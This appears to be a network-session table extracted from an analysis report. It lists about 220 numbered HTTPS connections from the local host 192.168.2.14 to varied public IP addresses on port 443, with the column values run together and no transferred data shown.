                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11445192.168.2.1444628103.2.197.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11446192.168.2.145115232.153.23.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11447192.168.2.1448864143.11.214.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11448192.168.2.1434794119.220.153.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11449192.168.2.1443976174.98.157.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11450192.168.2.1439880170.186.238.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11451192.168.2.1460632130.2.164.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11452192.168.2.144122846.251.86.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11453192.168.2.143658670.51.254.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11454192.168.2.1440454156.117.240.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11455192.168.2.145527048.53.106.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11456192.168.2.1447536208.216.190.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11457192.168.2.1447902130.119.49.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11458192.168.2.1436074149.172.27.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11459192.168.2.1443114220.223.255.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11460192.168.2.1436588146.6.46.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11461192.168.2.1449996185.154.197.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11462192.168.2.145203659.107.238.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11463192.168.2.1436636211.32.190.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11464192.168.2.1448506109.152.199.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11465192.168.2.1433722109.179.50.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11466192.168.2.1445850216.64.197.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11467192.168.2.1447386126.108.93.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11468192.168.2.1448158221.204.96.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11469192.168.2.1456784182.187.125.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11470192.168.2.1446966151.75.3.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11471192.168.2.1436544213.206.164.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11472192.168.2.145367894.126.166.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11473192.168.2.1447806173.245.73.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11474192.168.2.1447398173.201.72.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11475192.168.2.1442370176.186.56.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11476192.168.2.143576676.85.141.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11477192.168.2.1444554106.148.214.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11478192.168.2.144299825.35.78.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11479192.168.2.1442756179.152.213.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11480192.168.2.144275653.30.176.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11481192.168.2.1442862177.169.243.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11482192.168.2.144358659.183.160.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11483192.168.2.1454310223.160.64.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11484192.168.2.1451856160.135.73.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11485192.168.2.145370238.77.126.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11486192.168.2.1458972115.2.22.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11487192.168.2.143761038.221.204.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11488192.168.2.1451672179.42.254.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11489192.168.2.143539071.116.75.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11490192.168.2.146080686.208.253.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11491192.168.2.1455318173.14.134.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11492192.168.2.144073853.35.237.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11493192.168.2.146083483.74.237.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11494192.168.2.1454282179.9.69.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11495192.168.2.1445846173.52.146.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11496192.168.2.144780084.204.207.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11497192.168.2.1456958193.120.128.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11498192.168.2.143701237.113.46.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11499192.168.2.1435808184.251.74.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11500192.168.2.1458160139.29.194.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11501192.168.2.1435862168.178.213.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11502192.168.2.1449542137.181.248.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11503192.168.2.1439148137.109.202.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11504192.168.2.1443936159.151.123.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11505192.168.2.1454254123.39.141.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11506192.168.2.144092077.190.174.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11507192.168.2.1441700172.213.136.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11508192.168.2.1457306123.203.7.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11509192.168.2.144504046.117.220.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11510192.168.2.1438722122.202.119.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11511192.168.2.143775692.132.16.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11512192.168.2.1439646166.77.40.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11513192.168.2.1452416110.242.41.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11514192.168.2.145056059.82.158.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11515192.168.2.1443172171.42.25.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11516192.168.2.1439082173.131.116.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11517192.168.2.1435384176.106.101.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11518192.168.2.1460406137.60.249.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11519192.168.2.1437458109.56.149.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11520192.168.2.146089847.12.179.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11521192.168.2.1435134167.115.166.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11522192.168.2.1437264200.27.247.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11523192.168.2.144617441.112.26.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11524192.168.2.144585883.224.56.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11525192.168.2.1451814147.54.65.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11526192.168.2.14353122.33.112.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11527192.168.2.1458298177.109.14.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11528192.168.2.1453216180.51.226.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11529192.168.2.1435658130.218.199.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11530192.168.2.1454680205.165.47.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11531192.168.2.1446278155.50.127.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11532192.168.2.144943297.242.58.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11533192.168.2.1437514147.198.241.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11534192.168.2.143886653.254.164.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11535192.168.2.145730272.17.36.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11536192.168.2.1438310216.192.234.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11537192.168.2.144468239.160.241.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11538192.168.2.146019454.174.148.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11539192.168.2.1440088207.229.249.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11540192.168.2.143707886.129.109.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11541192.168.2.1439242125.10.114.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11542192.168.2.1449192141.33.196.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11543192.168.2.1432938184.165.93.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11544192.168.2.1433046100.169.207.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11545192.168.2.1438752187.99.176.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11546192.168.2.1460502116.216.62.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11547192.168.2.1457740185.200.97.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11548192.168.2.14384602.168.114.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11549192.168.2.145448614.129.128.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11550192.168.2.145641089.96.158.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11551192.168.2.144800074.198.188.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11552192.168.2.1458196222.92.78.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11553192.168.2.1444390204.30.80.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11554192.168.2.1450498168.134.226.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11555192.168.2.144770495.82.57.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11556192.168.2.14545402.192.193.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11557192.168.2.1439142201.146.222.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11558192.168.2.1439414184.7.218.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11559192.168.2.143335671.1.202.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11560192.168.2.1452042177.244.173.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11561192.168.2.1459268152.253.176.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11562192.168.2.144451824.36.231.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11563192.168.2.1460056163.68.247.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11564192.168.2.1459358199.225.87.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11565192.168.2.143782663.186.223.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11566192.168.2.14600588.50.221.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11567192.168.2.14361684.203.50.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11568192.168.2.1458120188.144.71.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11569192.168.2.1448878113.45.216.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11570192.168.2.1451820151.175.109.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11571192.168.2.144186635.44.163.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11572192.168.2.1445114145.63.141.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11573192.168.2.145020468.235.70.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11574192.168.2.1453850126.114.115.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11575192.168.2.1450676137.100.46.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11576192.168.2.1460870110.61.182.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11577192.168.2.143592652.179.126.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11578192.168.2.144656234.72.74.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11579192.168.2.1453712168.247.235.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11580192.168.2.1459378115.178.88.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11581192.168.2.1455384150.173.81.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11582192.168.2.14437401.129.99.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11583192.168.2.1453874203.127.15.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11584192.168.2.1451894173.91.124.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11585192.168.2.1447458195.192.176.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11586192.168.2.1460868151.126.68.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11587192.168.2.144476624.50.1.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11588192.168.2.143441220.88.56.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11589192.168.2.1459362126.177.103.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11590192.168.2.145797280.185.99.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11591192.168.2.144102886.172.248.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11592192.168.2.1436288199.131.252.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11593192.168.2.145555045.125.182.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11594192.168.2.1443770196.140.230.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11595192.168.2.1438912114.154.187.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11596192.168.2.145116672.146.23.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11597192.168.2.1459556117.237.199.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11598192.168.2.1433736103.234.27.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11599192.168.2.143673685.234.152.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11600192.168.2.145264285.243.109.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11601192.168.2.1433658203.4.11.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11602192.168.2.145959293.77.58.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11603192.168.2.1452868125.218.41.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11604192.168.2.1445552102.184.228.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11605192.168.2.143567876.75.94.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11606192.168.2.1438666201.172.61.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11607192.168.2.1437570144.211.159.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11608192.168.2.1436320113.177.22.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11609192.168.2.1443770201.9.168.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11610192.168.2.143284467.170.254.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11611192.168.2.143856637.52.54.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11612192.168.2.1459472141.121.33.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11613192.168.2.144588840.9.211.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11614192.168.2.143825053.166.9.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11615192.168.2.1438208136.52.8.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11616192.168.2.1452356124.138.216.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11617192.168.2.1449556176.92.246.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11618192.168.2.145707670.52.241.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11619192.168.2.1454818189.130.204.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11620192.168.2.146020650.235.168.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11621192.168.2.1435554166.53.48.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11622192.168.2.1445928117.42.135.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11623192.168.2.145313675.167.193.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11624192.168.2.144175473.113.234.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11625192.168.2.1442524151.211.108.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11626192.168.2.1446530196.252.218.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11627192.168.2.1447760169.66.183.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11628192.168.2.144582277.198.10.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11629192.168.2.1432836182.46.171.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11630192.168.2.145908676.21.97.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11631192.168.2.1460554190.159.180.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11632192.168.2.144193047.75.45.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11633192.168.2.1447288113.234.176.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11634192.168.2.144346480.159.117.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11635192.168.2.1440260143.56.78.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11636192.168.2.1451664216.156.133.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11637192.168.2.1456294113.253.36.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11638192.168.2.145904040.203.251.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11639192.168.2.143723094.112.221.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11640192.168.2.1445324213.230.178.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11641192.168.2.1442550187.138.147.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11642192.168.2.14416142.123.206.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11643192.168.2.143469287.253.228.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11644192.168.2.143611275.254.91.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11645192.168.2.1454036125.196.44.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11646192.168.2.1438714201.192.229.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11647192.168.2.14550308.89.206.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11648192.168.2.1437766119.89.105.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11649192.168.2.145095071.161.181.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11650192.168.2.1457582161.150.221.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11651192.168.2.145502290.141.18.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11652192.168.2.1459574149.75.165.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11653192.168.2.14493781.20.69.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11654192.168.2.1449170101.103.8.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11655192.168.2.143903086.21.192.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11656192.168.2.1448900212.77.37.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11657192.168.2.145314044.238.202.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11658192.168.2.1448276103.204.200.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11659192.168.2.143552877.91.146.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11660192.168.2.1454304149.52.110.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11661192.168.2.1434794194.70.118.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11662192.168.2.1451232192.56.5.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11663192.168.2.1460560104.177.101.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11664192.168.2.1433756194.19.246.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11665192.168.2.1447984144.41.40.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
